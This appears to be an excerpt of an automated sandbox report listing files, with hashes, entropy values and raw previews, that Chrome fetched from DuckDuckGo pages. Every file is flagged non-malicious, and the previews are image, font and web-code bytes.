                                                                                                                                                            Entropy (8bit):5.262774065321455
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:ahOCvjwxJZzcXI6+jyXu4KaEV/gbXc20ZHLwD8EaBtrRyX0n:ahOC0x96ruNiXcvh0jyxRyXa
                                                                                                                                                            MD5:2148FEAC62C3267F1ACACAE3031707C1
                                                                                                                                                            SHA1:8A568D6628A6F94161AB6268799647795E17EBEB
                                                                                                                                                            SHA-256:03A41D1F14A05121707D12E64640B67E4DC7D51026F5B0EAC7147FC4A3286CD5
                                                                                                                                                            SHA-512:1AFB38F241A114B5F85BE9891D0757A2A3C7245D80A56945D5107B850D623DF586CEAF6D646AA5618236038B305FC9493BCBAF0ED8042E7770BB2BABEC5A96D8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[49774],{64448:function(e,t,n){var r=n(67294),l=n(96086),a=n(63840);function o(e){for(var t="https://reactjs.org/docs/error-decoder.html?invariant="+e,n=1;n<arguments.length;n++)t+="&args[]="+encodeURIComponent(arguments[n]);return"Minified React error #"+e+"; visit "+t+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}if(!r)throw Error(o(227));var u=new Set,i={};function s(e,t){c(e,t),c(e+"Capture",t)}function c(e,t){for(i[e]=t,e=0;e<t.length;e++)u.add(t[e])}var f=!("undefined"===typeof window||"undefined"===typeof window.document||"undefined"===typeof window.document.createElement),d=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD][:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):13056
                                                                                                                                                            Entropy (8bit):7.9825753785894475
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:WfM15VwkXsc0FbwCxzQWorYzNGIxW+TEGqq:H9wXhvxzFokzUIfQw
                                                                                                                                                            MD5:73727546A9F348A13031D2BC949E23BB
                                                                                                                                                            SHA1:CC63703BA1EF05070C32229137E70FAB7D8918A6
                                                                                                                                                            SHA-256:F16AD8E6CFAD2B8926DE41097901917D24471AD55AC2217B443D7BA19AF6D174
                                                                                                                                                            SHA-512:BB63BC4203E61128703844AA5DFF1D1192D980C097D8119D994D51AF96CF4E6D17B1BAF4415FC562FF8CDF3461BEA5C16A9F250A8D972041D13C668A5CAFB987
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.PNG........IHDR..............>a.....pHYs...%...%.IR$.....sRGB.........gAMA......a...2.IDATx..}[.fWu.Z........1.0...1.$.I..H<.BH.R.JJ..RH~..Ty.......*.*..D.*.x.\.c...G...H......JB..#.I3..Y.g......{.?.iQ..-......{.u...&.k{m......^.k{m................S.......Y.o.4...x4.....C..>..,...qi>o.0..q.~f.].e.3>3I......h.t...y.3.{.X..H..Q.Q.{....:{d....z............1o)D.A..Bgo....I>.*...1i...w...X...x.r.Dc:..4...a..!..X.ii.<.....v..4a..<..........c.7...r.U...."......;..y.iGM.IV.....&.A....(..V....]!f.~\QaD@..0....jn..r+WTQ.`.>0FC.<.t.....6..m.v.Pa....G..(B./.eU.$b........22.H`.\.#.iD0V...;E!...........f.sX.^2Q.cu#<.$1Or.b...4.4IY.....==^:..S..|.v.]...V/4...P?4I.d.....Uk4.....[1..?gN.y%.......4%b.|;.4'.+..Y..9...-.M...l$.....>..g....=W..W........eRkY....&?.K?m..P.d...z./1.."9X.g2...c..6QH@'..4...N%mA..y...ml...r..Ue9.<..j..y+..._.u>.>Ut...P.')Pr.L).ZD.0z.=Za.._W.....c.nP@7.BeeYP<c.#.^.....#......H@..o-X1.....8(>...]....y).`.....u. ..:'..S.....o.X0....*.,E.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 100x297, components 3
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):1577
                                                                                                                                                            Entropy (8bit):6.972891543192576
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:3c1spgC5OwVaJRP+bxV5oR9IFn/ZuB/vZG5W8GzxIC2qnNwN9s:3iWp5OwV6+FPoR96n/ZABv8GzdlOk
                                                                                                                                                            MD5:A13986781C5A7620F21C5847CE44D284
                                                                                                                                                            SHA1:927D96F1DC04C21CD995CF60E349D57D56AE237E
                                                                                                                                                            SHA-256:454A6A76D1A76D8B3EA210EE21093A538E4A0B8B542D181E1864699EFBE445D0
                                                                                                                                                            SHA-512:5D1B265BCB1A70BBDEC7E851941694054BA61A3EA22375B134C548C12D606A0CEAA5B3CDB6535EF661919CE15864FBBB549F4E911A59BF38FF6F0DC797E98FAC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/backgrounds/about-bg-sm.jpg
                                                                                                                                                            Preview:......JFIF.....H.H.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......).d.................................................................................H..bZ...J...A(D#gM8%...Z.".....e..Z.B!.:....JA)....N...e..-..D(.ms.0JJ)..E...|.s.....@$j..fK...K..!MWm.'Y.RR%.R.(.m.%%..KJA..b...*A))....]..*A.e.R VF..d...iH%.I..y..H%.PH...g.E R)BX.#...H.RT........h..B!+;w.(.),.D$u.%.....R..r.E(@...t.B...P.H.|..-.)...........P"(.....j. ......"(..H..""".$...."%... .. T.H.3P,Q....f....b.4...,D2B"c..,DC..H.@.X....Lt.H.....1.......BFz..,.%..'................................w...............................?.w...............................?.w...............................?.w.......................0.P..@p........?!.0..^.l,..2..8.f"...............e..R.R....Kg.~^.7]..u..i..K0.....R..p...v.G..b.m..>B.....C.4.B[/.+......S.[.e.-T!.B.6.0...X.m=!U]...*2..'..J?...#...m-+....v.RO.@0B...Ja.)-#..&...4.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):61
                                                                                                                                                            Entropy (8bit):3.990210155325004
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4087
                                                                                                                                                            Entropy (8bit):5.005746032102585
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:WQQPgdwSBQJ51pKiSZWpD8JyzEtIdjpCFP+euKrF9bsQFDvdHd32nTP2htgeXsIu:WQQPgd3BQJvpKiSZWpD84zYItpMP+ef2
                                                                                                                                                            MD5:87C53AB728033EB6CEDB21C294EA67CA
                                                                                                                                                            SHA1:3AF9D23725B5576EDC2F08A2043F9BF2452144C8
                                                                                                                                                            SHA-256:A04AABA05A8830CC55F1CBECB7BF4F5100D6BB7FF3D805D0D3ECB3CB29E172B0
                                                                                                                                                            SHA-512:080D7A0360180CEE90FB046EC868196A5643EE8B642190F1BC49CE913C64D5BE0ED3ACF74E5866183D01A8F7EDAAF79955A04B438187DB4E277E2CFB08D85E4D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:{"pageProps":{"translations":{"locale":"en-US","messages":{"32k7NP":[{"type":0,"value":"Learn More"}],"qffLa3":[{"type":0,"value":"NEW"}],"7NUyVN":[{"type":0,"value":"More from DuckDuckGo"}],"0pHSXl":[{"type":0,"value":"Downloads"}],"aqcGw9":[{"type":0,"value":"Search"}],"avoqNl":[{"type":0,"value":"Other Resources"}],"KpnRFa":[{"type":0,"value":"Android Browser"}],"irtBA+":[{"type":0,"value":"Email Protection"}],"kovAeP":[{"type":0,"value":"Themes"}],"1//Wzy":[{"type":0,"value":"Settings"}],"F8YRUV":[{"type":0,"value":"Mac Browser"}],"Ptbguk":[{"type":0,"value":"Windows Browser"}],"amPlaq":[{"type":0,"value":"Browser Extensions"}],"XQM/H9":[{"type":0,"value":"iOS Browser"}],"k0sRjT":[{"type":0,"value":"Homepage"}],"Mt9udP":[{"offset":0,"options":{"one":{"value":[{"type":0,"value":"1 million reviews"}]},"other":{"value":[{"type":7},{"type":0,"value":" million reviews"}]}},"pluralType":"cardinal","type":6,"value":"num"}],"uutXgw":[{"offset":0,"options":{"one":{"value":[{"type":0,"value"
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 670 x 1264, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):107143
                                                                                                                                                            Entropy (8bit):7.9865347373558375
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:i7Chf4WTu5Bx/dBQsSMS1OAG35FIw0hwrDhpihSEyWugTkgU/nkBpMYnapl1Vq7B:iGZgBpfS1HGpFuw/hp/2cnUagkK+e
                                                                                                                                                            MD5:D7A9624777768585B192B954246F2924
                                                                                                                                                            SHA1:22C6430C735AEFE12A564A5DC6E36443F496FC04
                                                                                                                                                            SHA-256:EC1517AF9A6E24B331AE640BC1505E15225A211444940BD87C0016D6E275A6EE
                                                                                                                                                            SHA-512:1E234C80D8494F82223FF406CCF9AB8AFDE6A15AFF0AEBC604EAD76D9223DBC9610A0D1EC00261FB7FA035C53CA071D83C70B797C7E83E526E5897902E6940A1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/image/pages/home/devices/how-it-works/search-protection-ios-light.png
                                                                                                                                                            Preview:.PNG........IHDR.............j.......PLTE....................................................W3.................m............##$................................................~~~***...qqp434.........xww...........................WJB......I>8>==.\:..GDA........fff...5&.JJI.......A3-njhD,....QQO`]\.9-%....P1....hC-UD2....cUL*Ohq^TN8,]9$-"........cB.........zJ%...t;.WWW..sT.....e ..Y:........~iY.H.x...b..z.eB=...........~s..-.d.x..uW.8L...tg+...~:.U.r.W..#..$...lLrO:%CY....r,...R....k..p.yJ.r.Q).......{fF.......A_S0._&.l<l`;a2.D=(..Q.....N%...~..a......F....ZC....~.n.Z..U.....T......o.e..~....>>^e..d.N...a...;k.G.rv|x<..6.x.5c.V.P....g..o................*.......Qr[.....|.._.Q....>+....U1U....3+u....;...(.^e..mPn.......... ..{u.i..{).i.....tRNS....!*..qY...*....-IDATx...............................3Xn........t.....&.2.O=Dd.#..F.@.4..c.1..c.1..c.....B...m......~......T....%.. ..5.0fz.".......=.n....T.F......4........<.45
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):509
                                                                                                                                                            Entropy (8bit):6.1460160814912586
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:6v/7S//4SqMDuaqqqqq1IBc4Y1HFqqqqq7lPl7:vqaU4UOl7
                                                                                                                                                            MD5:95877C3F0436A0C14803D7908D2C5041
                                                                                                                                                            SHA1:8E7A18EFA4C1853DAA5C9C7E5CE5FCF91381702E
                                                                                                                                                            SHA-256:AC420C082866099FF585E804FE2B2EA67E77EA7B3B960DAD3200103E5638144C
                                                                                                                                                            SHA-512:8C22FFCF6385D2EFAE52A25F51E2147DD59044947E8D601717634F7654B8E0E34F124C8E0F09647BA6DF590D268C80A4B1741A48FD5D75473EBDA62E33A73029
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:.PNG........IHDR..............>a.....pHYs...%...%.IR$.....sRGB.........gAMA......a.....IDATx...!N.Q.@..A .l...K.........g.....Be...M.9................8..}7&o7....h...s;^..-.Oz..4... N.q...@.....'.8... N.q...@.....'.8... N.q...@.....'.8... N.q...@.....'.8... N.q...@.....'.8... N.q...@.....w3N......[..}...f......gl..o...!p..y0[|...yL..6.?...p.....i.u4{..k;... N.q...@.....'.8... N.q...@.....'.8... N.q...@.....'.8... N.q...@.....'.8... N.q...@.....'.8... N.q...@.....'.8.......\.o....9..J....IEND.B`.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):2473
                                                                                                                                                            Entropy (8bit):7.8739810788251665
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:a9zK5sCxVrIa9OoqQoQdYsSlf13HzLWRmUZEKF:a9zK5Xx+a9BVo/rlf13H3tsZ
                                                                                                                                                            MD5:605D4ABAC4269D31F29A0415B17FF10D
                                                                                                                                                            SHA1:AC072BB4D08488E11CD0053AE8CB92FA5CC3FB99
                                                                                                                                                            SHA-256:BB99A6E6F303284F2B35F0F907BBBBF0B5C86F311EC705829868D4E86295A3CB
                                                                                                                                                            SHA-512:B1AC8BF1A688CB0CAAEA9ACCF0748F77F6FAECEE381C0A8892794F3BF31B20A9BB0F3902411300087788A1514F84662DC3E4C6711272D0406D872BFDD9DBA70E
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://lh3.googleusercontent.com/buoRxpVerhTQPyzUa4kX_9FaWmzrl5LVSVyLGzJP9E8dRLyP-8YLID_HSlRNZxo2RLHBY7N7h4k77ayFBG_eWq0GGQ=s60
                                                                                                                                                            Preview:.PNG........IHDR...<...<.....:..r....sBIT....|.d....`IDATh...K.dG..._....$&..... .Pp#.F..@..+....].a\EMHD..&(n....Dp#dc.p#d......tn'......].wQ.:u.......}..|...U....s...>A..A..$@..@.6.qG.`..7...'...K.b..+.\....8H!.0.P.D.....O...m.u.{.|.1......,H........w.x..6.S......OYXf.}... !z.m.7.....x.....3.%....................s.....5@.&..|.m......&...24...R`...h.+!>....ln.q..2`^..1..JD....O_:..../|\....)..v..y46.hr^...%..r.I..r....~h../.j\.(m^..D...........D.\.....r.jG{o.&8..t<.,O..)........a..#.IL..V....D2...c..~.0...8...>Yc..-.z(..uSu.".f.E..,..+.D..7...j}...2.%l.......>......d..eh..L..f.H\..3.B.C..".h........k..H?._;l..f`...>.f3....o..@?.........C.{...?..%l.*.IZ.k"..-...Db.9L;l_..0Rj}.lU1....[............A...6.....h.%A...7.....U...g..?..7z.p.l*Pb.$..b<l..D.x...&.....N..|..........5.A.x.y..-(..C.a+.Yh>/.....C.......b.|....x......q.y.Hi.n....l,.....e..B..ZX.4,r...h....q.z..s...u+.s^.......p....n{&..o...EXu.....wMA..O'O.......Y......r..$.L..0`l60g'..C
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (23654), with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):23654
                                                                                                                                                            Entropy (8bit):5.337934006446474
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:wihuT6ilSV8rrlH2gKXb2xducG2IuL3+C/ySLbLizT2W5hkPEw1vooTkkksk:z8aX6T3+tuOVhkPukzk
                                                                                                                                                            MD5:4C2AF44948F3D51F3BD3BE2146630F82
                                                                                                                                                            SHA1:9FF33410B7E39866B12ECA954B62F0ABE6A6B627
                                                                                                                                                            SHA-256:C542A46C4A65F14262D7A21AB24EDC5F4E94DCBB9E855F01E9E45DEA5A939DF5
                                                                                                                                                            SHA-512:FD31C5E54342BFD8BD7CE07EA81718A0507DC9A9F4507F60B2AE69CF4D0A1EA3A21AF4B981BA43E4DADFF199903C10E08F081A82FF1165E4E895E341591F83B2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[49224],{765:function(e,n,t){"use strict";t.d(n,{M:function(){return c}});var r=t(67294),o=t(96637),a=!1,i=0,u=function(){return++i};function c(e){var n=e||(a?u():null),t=(0,r.useState)(n),i=t[0],c=t[1];return(0,o.L)((function(){null===i&&c(u())}),[]),(0,r.useEffect)((function(){!1===a&&(a=!0)}),[]),null!=i?String(i):void 0}},73262:function(e,n,t){"use strict";t.d(n,{Gk:function(){return ie},Lv:function(){return ce},O2:function(){return ue},SF:function(){return ae},gA:function(){return oe},h3:function(){return ve},hQ:function(){return re}});var r=t(67294),o=t(96637),a=t(45558),i=t(85777),u=t(94411),c=t(69695),l=t(40884),s=t(61331),f=t(13026),d=t(12837),v=t(24683),p=t(28274),h=t(765),g=t(44270);function b(e,n){if(null==e)return{};var t,r,o={},a=Object.keys(e);for(r=0;r<a.length;r++)t=a[r],n.indexOf(t)>=0||(o[t]=e[t]);return o}function E(){return E=Object.assign||function(e){for(var n=1;n<arguments.length;n++){var t=arguments[n];for
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):2134
                                                                                                                                                            Entropy (8bit):7.738686412916403
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:mXIZ4hnR/5Q+dgTpwuAvDCVpxkCO+cVXSGBJ:2kuLJdgTp7lkH+cMGBJ
                                                                                                                                                            MD5:A1186AD62CD74B50F71413011C393483
                                                                                                                                                            SHA1:AA9454F7ACB8996B77C1BA54D5C85D598522075B
                                                                                                                                                            SHA-256:68AC001E6B000703025DC8CF60C924F7D69213452D8A1C21D91BF62AE7E16A48
                                                                                                                                                            SHA-512:81AC621E60511C1BBC4A40257BD19382E2DBBACA85C3B3D32568ED9DF4989FA1A70594B92CBAB9384475D1A5411EB75E23876799A6DEF9647A967F5B7A3E47A0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/_next/static/media/play-store.e5d5ed36.png
                                                                                                                                                            Preview:.PNG........IHDR..............>a.....pHYs...%...%.IR$.....sRGB.........gAMA......a.....IDATx...o[E..g..(...j.qs..q...Bq8.vAm.....?.....b..hsGJ*q$..p...Qq)6pB..A..P!#.Fi...8..T...og.~.U...........x<.....x<.....h.P=...B..... >]..g;......}v.Bm.<..M.S......^..i..[.1]...(..8Y}=7........V....J..O}^<..G|..F......O....V...y..&..(.-fRA....(B}........R."x.....Z*.0.....>...N/.W@.....-.$../}R<.0..a..X>..U/B4"..F.>w.b......l?.....d.-..~?.1.... .A....S.g...g F.......K....G.sd....H....kh...e. vH.Y<.t.?...R..K$@v.....}[8... .I......V..`....X%A...o..G...}.<..q..... .J..p{.....K%.n[.%..~..$.#. .J ...$.."_....<...;...=..XL+..SI.d2V.$#w...W....%il4..B@.H.Z9.......V.M....Hg.pj.Xu.-.*.BH.<1.w.|....%.vqg.l...=...._..Q..X#.BP.$..e.m.*....@.Z..a...].v...F+.@(K ..^]X..66.gs`1...P......n.g...o.._.].U...@.I ..q..",..[.C....P.`..{./..{.../Gg..H.....!...K1X..-....U.....m.+..G.......m...~/..2...j...@l. j.=t....LW... qK.0.^r..F.. qI.).=.....@3..@LK.;...x>.=6...1%...{..e.m........~/....g.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 41816, version 1.0
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):41816
                                                                                                                                                            Entropy (8bit):7.994738466360287
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:768:gYl8POMQzty0ZGkL/TCeLwIF3N1mWUhY8AdRw/SplV//:/82dZyVkfCeLwA3V3OSV//
                                                                                                                                                            MD5:4D5698622D8FB4000A4114F204A22904
                                                                                                                                                            SHA1:41DF913C2C8D5E453720376A842F1CD5028CC2A3
                                                                                                                                                            SHA-256:D4FFA5E62DD2B9DCB4ED73998595529B1D4F89B265E21D951D2E73D783A673A1
                                                                                                                                                            SHA-512:F38C07F5BC83348FFED6D52B9A625077760ACE0D756C0C6B0CACFEE13A4CF98909356FFD1666A968EB67E63674EE7C65D60824034D2092FA572F9AD20BDDEBCF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/font/ProximaNova-Sbold-webfont.woff2
                                                                                                                                                            Preview:wOF2.......X.......................................?FFTM..f..x..D.`..&..F........T..r..`..6.$..<. ..\.....a[..q..v.@...c...Fo..z..spuY.mTm>6..a.r..w.B.........F.y.u...V..m.u.....5T_U..KU...N...V......>oT.$."....<:.K....$y/.Y..lM.&..T.Wa.......}...E..?._....>./..4....9..2.B.O.+.!>...mXP.X.01u..W.....J.:....$O;.=b...v....c...J.!.<N....3v.@2Alx.......w......#.W....[dAV".x..........x.7..7.0...Z{.......HC.../...`$.<.../.......m..#4...hd..../G8.....I..AG...a..y...h.@O...j.........!.?".q~(.~..7=.k...}...I.U/=O.......'p....w.@../..H.dr.u.....6......M.4$...YF...!...{..x..jp...........E#M.....5.N.-l..L...d...U$.@U.........!...'..{....Lv.ho.......&3.....W.Wt...C`;.'......ZD.|....t..;.....P...;........m.<.......<>.......xg`Q.[...+......AI..j......w.Y.l.H..A.x...7.....TI....*+.aS.6.`.....pX.....,...,PZ...j.P.....p.t.7.z.WB.F...]..K2l.4E).....n./'l...6......^.?....c...[.....8...x8.....=..... @s.'.p..8..>...K..|.....A.6..!......f..L(@..5G..P.T+.....J..@.loHwY.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):86992
                                                                                                                                                            Entropy (8bit):5.781602409270405
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:jac8Ic12140AwTjE4ynTX20IcKIcaUTWw:+c8muwTjE4yTF8w0r
                                                                                                                                                            MD5:E235E9D34C284C850974AA7D7B7C83CB
                                                                                                                                                            SHA1:04CA1B6A715A50D834CB6012F72FE844CCA3E026
                                                                                                                                                            SHA-256:30D14F0AF77DA8D1C94E61C6FEE145CCE1EA958F4CA5C663EE99742CFC3B6699
                                                                                                                                                            SHA-512:B546CCEB2AEDAED9DFEF607460747A3EE64CCA677CE1C292C9373A5AF435A08D2533D7F03E21B70A61365AE75C5CD4DAE60D2B7D6E25B1580C87E2FBBA3685F3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/windows?origin=funnel_home___hero
                                                                                                                                                            Preview:<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=1 , viewport-fit=auto"/><title>Download DuckDuckGo for Windows</title><meta name="description" content="The &quot;easy button&quot; for privacy, now on desktop"/><meta name="twitter:card" content="summary_large_image"/><meta name="twitter:site" content="@duckduckgo"/><meta name="twitter:title" content="Download DuckDuckGo for Windows"/><meta name="twitter:description" content="The &quot;easy button&quot; for privacy, now on desktop"/><meta name="twitter:image" content="https://duckduckgo.com/static-assets/image/windows/screenshot-light.png"/><meta property="og:url" content="https://duckduckgo.com/windows"/><meta property="og:type" content="website"/><meta property="og:site_name" content="DuckDuckGo"/><meta property="og:title" content="Download DuckDuckGo for Windows"/><meta property="og:description" content="The &quot;easy button&quot; for pri
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 31568, version 1.0
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):31568
                                                                                                                                                            Entropy (8bit):7.99179193151151
                                                                                                                                                            Encrypted:true
                                                                                                                                                            SSDEEP:768:nV/PrFLvj4faRm0uZd9N56pGyOPRA3Y8NyjZ:pPrFbjU0m0Qd56pYA3YUa
                                                                                                                                                            MD5:EB11BFB369775FF0739DABB3A5F379CC
                                                                                                                                                            SHA1:2EEBAEA2F7080C0B256FBFC70AB91473243AF0F8
                                                                                                                                                            SHA-256:2E0BDC192134BB3950A1BA4C1148901E39EBD8D2D01F64EF23106E90A9F771B0
                                                                                                                                                            SHA-512:59E89752E932AADE54D5B2B940E09F3C8B12A836F1C5EB515E82036A97492F42E12A4FB3DC156CB8D969D6CB4E8FD8F18B358715F972E12D4596AD390430CB21
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://fonts.gstatic.com/s/productsans/v9/pxiDypQkot1TnFhsFMOfGShVF9eO.woff2
                                                                                                                                                            Preview:wOF2......{P......H...z...........................X..j.`....l..a.....P.._..8....h.6.$..l. ..8..{...[.3.@..o1.........(..vD.D^r.;..(..7%....?/i.a.t.kKa...fi(T.DE.....P.b..-n.i..=.q-1QR.$...1..3C.....A..v...y:.n....&M.}.p)...r...p.l...5t...I..N.....>G..Of.f...N.H"y.{9....d......u/..f.&=...:..@...A.e3.a2.e.R f.L..E..nN...mO...+.....f..`._..G....O...s].q..).m"k..a...U..........SDRR........^J..g.J......Mcic......u.f".|.:...J8./...zv.....?1.........<...[.-<.I........k<.M.kp]j.?...l.....d..Y ........k.(..M.S....E.(...~..#.........}..91 ...d...k...6....m.XA........p*.X.`.6...u.l...o..._....S._.G.....%SZ...K.~..1.Z.....vu..2...T.+E...Ob...\..D&...KdrR9..T"......Hr.T".. ..e........B0...._.O.\.33w.........-...2....u..K.+.J....R....G.TX....nI....@.."*l.%t..-$z<....1:.F.9.......5...f.4..%Y2.P.@.t.....S..e.1..z...o<....O.*ECp....z.....g. (...*....];...7...r..w....Z8W.$.z$.z.y{...6.........F.....'..y|...R.ss...[.UM.".}.d....d..f.%.l.A..N+\....H..Y..*t
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 23 x 30, 8-bit/color RGB, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):61
                                                                                                                                                            Entropy (8bit):4.002585360278503
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:yionv//thPlmr4qlCyxl/k4E08up:6v/lhP4Eqt7Tp
                                                                                                                                                            MD5:D62238CEBEA25A62F9BEB61273D20EED
                                                                                                                                                            SHA1:5F5D7DBC8050E4DB06A735DA5ACF26B4F2F6E741
                                                                                                                                                            SHA-256:F8265A5092A098AB7110DD7944B483A1237BFD707A3C86D9992F469A347BF5D9
                                                                                                                                                            SHA-512:8F5612675652990CE3EFAB5758CA42FD01D482AB29BF2D823A0E89CC7C0BE4DD6026BF94D85B9E5F1B2E53A05EADE744EE8C699298809E954F74521D5476725F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8cf2ed9a6c2641de/1728356926478/QCsHjgUpquPAy0Z
                                                                                                                                                            Preview:.PNG........IHDR.............HG.?....IDAT.....$.....IEND.B`.
                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            File Type:PNG image data, 834 x 1258, 8-bit colormap, non-interlaced
                                                                                                                                                            Category:downloaded
                                                                                                                                                            Size (bytes):60280
                                                                                                                                                            Entropy (8bit):7.972056164007466
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:R6dez5XdhDfrgyiw5I3ewXt1mtooJFpWA+xYv8TisLiwoaiJsC7SH:RoezH5rN69Coomx7iwBYsGSH
                                                                                                                                                            MD5:44EA6D78E236EC73C24BCC10D6D8E9A4
                                                                                                                                                            SHA1:EF3EE4446AE791B59910D8A2DDB1090124469F14
                                                                                                                                                            SHA-256:27F6316660455CB0350A2B6D39747CBA5C95A7C51BD518955F05407E0326BDC6
                                                                                                                                                            SHA-512:1EDAE35D5DC869936450DBF240AD70D787CE44DBFAF0FE0D97C6517762796D8E84672A33BA6781AE3234DF30BD9D6545DE1ABD45FF410A92CC52C31A19261229
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:low
                                                                                                                                                            URL:https://duckduckgo.com/static-assets/image/pages/home/devices/how-it-works/app-protection-android-light.png
